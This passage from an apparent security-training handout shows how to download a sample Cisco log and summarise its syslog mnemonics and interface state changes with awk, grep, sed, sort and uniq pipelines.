1106
1107##############
1108# Cisco Logs #
1109##############
1110
1111-----------------------------Type this-----------------------------------------
1112wget https://s3.amazonaws.com/infosecaddictsfiles/cisco.log
1113-------------------------------------------------------------------------------
1114
1115AWK Basics
1116----------
1117To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
1118
1119-----------------------------Type this-----------------------------------------
1120cat cisco.log | awk '{print $5}' | tail -n 4
1121-------------------------------------------------------------------------------
1122
1123
1124
1125Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5â€, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c†to count the like entries, then using “sort -rn†to sort it in reverse order.
1126
1127-----------------------------Type this-----------------------------------------
1128cat cisco.log | awk '{print $5}'| sort | uniq -c | sort -rn
1129-------------------------------------------------------------------------------
1130
1131
1132
1133While that’s sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren’t conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This insures that we are at least looking at lines of text that contain “facility-level-mnemonicâ€.
1134
1135-----------------------------Type this-----------------------------------------
1136cat cisco.log | grep %[a-zA-Z]*-[0-9]-[a-zA-Z]* | awk '{print $5}' | sort | uniq -c | sort -rn
1137-------------------------------------------------------------------------------
1138
1139
1140
1141
1142Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
1143
1144-----------------------------Type this-----------------------------------------
1145cat cisco.log | grep %LINEPROTO-5-UPDOWN:
1146
1147cat cisco.log | grep %LINEPROTO-5-UPDOWN:| awk '{print $10}' | sort | uniq -c | sort -rn
1148
1149cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10}' | sort | uniq -c | sort -rn
1150
1151cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10 " changed to " $14}' | sort | uniq -c | sort -rn
1152--------------------------------------------------------------------------------